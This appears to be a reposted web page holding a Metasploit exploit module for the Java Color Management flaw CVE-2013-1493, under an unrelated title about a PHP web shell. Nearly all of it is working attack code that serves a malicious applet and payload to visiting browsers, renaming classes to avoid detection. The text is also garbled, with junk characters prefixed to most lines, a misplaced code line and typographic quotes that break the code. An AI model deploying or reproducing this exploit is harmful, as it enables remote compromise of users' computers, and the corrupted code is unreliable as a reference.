STUNSHELL PHP Web Shell远程执行代码

admin

##

8 Y3 U/ h7 `, A) p# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
- d2 X! L" A" k: V7 ~9 b* N# http://metasploit.com/
. F/ E2 `$ z4 ]! G4 V1 k- m9 M3 M##
require ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
3 f2 k( w3 `3 `+ ]9 V2 u: ^. k* URank = NormalRanking
5 ^- M0 T  Q, t$ K3 Yinclude Msf::Exploit::Remote::HttpServer::HTML
9 Z7 L6 }. S8 d% {5 x2 binclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
; h$ m, T* q1 e1 E- DThis module abuses the Color Management classes from a Java Applet to run
! _- v" M  F: j6 U5 K( Rarbitrary Java code outside of the sandbox as exploited in the wild in February
9 P( I) E: C$ l- \- b+ k& }* Kand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
6 W( y& F- _3 C4 v5 \) xsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
8 m1 p+ w! F9 f/ t/ Z+ Twarning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
$ e, C7 f! e& ~/ x& K9 m+ _‘References’ =>
: `1 Y! U: |* }- i% I[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
! b# `) d" G: H7 L) m. j[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
( z! T# N, ^! [* w/ _6 K],
+ M+ X5 G7 q# z9 p‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
) W' ]) a8 V2 Q  [% t: J4 T[ 'Generic (Java Payload)',
$ t0 V! F3 d3 D$ n- G{
0 F' C  s3 Y* k: x3 {$ |' @'Platform' => 'java',
'Arch' => ARCH_JAVA
}
5 w( x( e3 T) r0 j],
; a" j% p' Z1 g7 R# P& }: C[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
6 ?9 U# `/ i( m3 O  t) W2 [}
]
],
: \& V- k& F' _" A% ^/ L3 Q2 T' g; H‘‘DisclosureDate’ => ‘Mar 01 2013′
  K3 T2 ^5 a6 o, n; p))
! J4 @+ v6 y& B6 C. G) vend
  ]6 |4 J; R  T% p) `8 Ydef setup
( O0 I" O, ^: w, xpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
  s. Z) {/ n0 f3 b% g2 U& U& `@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- f& G! P% g- [4 N& Qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
: m; q: C$ D, X9 j4 r& }- u  x' L% u@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 |+ c) ^% n0 [& C$ vpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' [. o$ B3 ]" U  @7 ]+ x@init_class_name = rand_text_alpha(“Init”.length)
* @6 I! |4 @: C8 ?% _9 D% a( K) R@init_class.gsub!(“Init”, @init_class_name)
super
6 _( _) v" s  P$ [" f4 J( Wend
def on_request_uri(cli, request)
4 k! E5 q7 d' v9 B" Qprint_status(“handling request for #{request.uri}”)
$ j" x5 t0 W* U6 t' ycase request.uri
  T: I) M/ t0 Vwhen /\.jar$/i
, i1 a; h' t! T6 j5 @8 pjar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
" f8 t" r, v$ d" n2 s. }jar.add_file(“Leak.class”, @leak_class)
% ]& s3 j, B! P; u. Q9 F9 M! \jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
0 r0 ^/ Q4 l  [DefaultTarget’ => 1,
' H+ X$ }; M3 R1 d  M3 gmetasploit_str = rand_text_alpha(“metasploit”.length)
( @; j5 ~# p- V- D6 wpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
3 S0 S. i" ^! V) Q" ?' E7 A" centry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 K) }2 @# d3 M. R8 B3 o3 H! G7 {4 O0 ?9 _when /\/$/
# l4 o  L9 q/ G5 a( G% Epayload = regenerate_payload(cli)
6 \/ m' O4 g; o7 l9 D8 f& i- e9 d* |if not payload
9 N$ {0 U8 T  ^" B* j3 V  ^print_error(“Failed to generate the payload.”)
send_not_found(cli)
  P$ o: T- F7 F4 t+ S' treturn
* y: @  `# w0 J( l' q: ?end
+ X0 d) D: M! ]! O) i0 ]! ]" O' Z, gsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
! @# {5 F% n' G( usend_redirect(cli, get_resource() + ‘/’, ”)
4 |  m/ g  P4 x5 U8 _, `) `# @$ q# dend
' c# Z* S0 ?$ B7 A. wend
# s9 n3 G6 L* W, y: y; T& Xdef generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
/ {, g% h( H* t! Y+ Yhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
  J% o1 k$ u9 j; freturn html
end
* }* G4 `3 Q$ |6 h+ {, ^* j5 qend
end
+ y& z. L3 N  |0 o